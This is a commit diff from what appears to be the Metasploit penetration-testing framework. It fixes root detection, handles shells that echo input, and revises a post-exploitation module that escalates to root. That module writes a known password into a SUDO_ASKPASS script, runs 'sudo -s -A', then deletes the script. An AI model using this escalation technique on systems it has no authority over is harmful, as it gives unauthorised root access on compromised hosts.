Always try both export and setenv. Fixups to allow for correct reading from echoy nix shells. Fixes is_root? to not treat an empty string as 0
parent
725431dbdb
commit
93a133d5de
|
@ -130,7 +130,7 @@ module Auxiliary::Login
|
|||
end
|
||||
|
||||
def password_prompt?
|
||||
return true if @recvd =~ @password_regex
|
||||
return true if(@recvd =~ @password_regex or @recvd =~ /#{datastore['USERNAME']}'s/)
|
||||
return false
|
||||
end
|
||||
|
||||
|
|
|
@ -6,19 +6,21 @@ module Linux
|
|||
module Priv
|
||||
include ::Msf::Post::Common
|
||||
|
||||
# Returns true if running as root, false if not.
|
||||
def is_root?
|
||||
root_priv = false
|
||||
user_id = cmd_exec("id -u")
|
||||
if user_id.to_i == 0
|
||||
# Returns true if running as root, false if not.
|
||||
def is_root?
|
||||
root_priv = false
|
||||
user_id = cmd_exec("id -u")
|
||||
if user_id and !user_id.empty?
|
||||
if user_id.strip.lstrip.to_i == 0
|
||||
root_priv = true
|
||||
elsif user_id =~ /^\d*$/
|
||||
elsif user_id.to_s =~ /^\d*$/
|
||||
root_priv = false
|
||||
else
|
||||
raise "Could not determine UID: #{user_id}"
|
||||
end
|
||||
return root_priv
|
||||
else
|
||||
raise "Could not determine UID: #{user_id}"
|
||||
end
|
||||
return root_priv
|
||||
end
|
||||
|
||||
end # Priv
|
||||
end # Linux
|
||||
|
|
|
@ -91,12 +91,27 @@ module SingleCommandShell
|
|||
def shell_command_token_unix(cmd, timeout=10)
|
||||
# read any pending data
|
||||
buf = shell_read(-1, 0.01)
|
||||
set_shell_token_index(timeout)
|
||||
token = ::Rex::Text.rand_text_alpha(32)
|
||||
|
||||
# Send the command to the session's stdin.
|
||||
# NOTE: if the session echoes input we don't need to echo the token twice.
|
||||
shell_write(cmd + ";echo #{token}\n")
|
||||
shell_read_until_token(token, 0, timeout)
|
||||
shell_read_until_token(token, @shell_token_index, timeout)
|
||||
end
|
||||
|
||||
# NOTE: if the session echoes input we don't need to echo the token twice.
|
||||
def set_shell_token_index(timeout)
|
||||
return @shell_token_index if @shell_token_index
|
||||
token = ::Rex::Text.rand_text_alpha(32)
|
||||
numeric_token = rand(0xffffffff) + 1
|
||||
cmd = "echo #{numeric_token}"
|
||||
shell_write(cmd + ";echo #{token}\n")
|
||||
res = shell_read_until_token(token, 0, timeout)
|
||||
if res.to_i == numeric_token
|
||||
@shell_token_index = 0
|
||||
else
|
||||
@shell_token_index = 1
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
|
|
|
@ -48,6 +48,7 @@ class Metasploit3 < Msf::Post
|
|||
def run
|
||||
print_status("SUDO: Attempting to upgrade to UID 0 via sudo")
|
||||
sudo_bin = cmd_exec("which sudo")
|
||||
my_id = cmd_exec("id -u")
|
||||
if is_root?
|
||||
print_status "Already root, so no need to upgrade permissions. Aborting."
|
||||
return
|
||||
|
@ -98,10 +99,9 @@ class Metasploit3 < Msf::Post
|
|||
cmd_exec("echo echo #{password} >> #{askpass_sh}")
|
||||
cmd_exec("chmod +x #{askpass_sh}")
|
||||
vprint_status "Setting environment variable."
|
||||
# Bruteforce-set the environment variable? is cmd_exec() always
|
||||
# going to be in the context of /bin/sh ?
|
||||
# Bruteforce-set the environment variable with both setenv and export.
|
||||
askpass_env = cmd_exec("setenv SUDO_ASKPASS #{askpass_sh}")
|
||||
cmd_exec("export SUDO_ASKPASS=#{askpass_sh}") if askpass_env.to_s.empty?
|
||||
cmd_exec("export SUDO_ASKPASS=#{askpass_sh}")
|
||||
vprint_status "Executing sudo -s -A"
|
||||
cmd_exec("sudo -s -A")
|
||||
vprint_status "Deleting the askpass script."
|
||||
|
|
Loading…
Reference in New Issue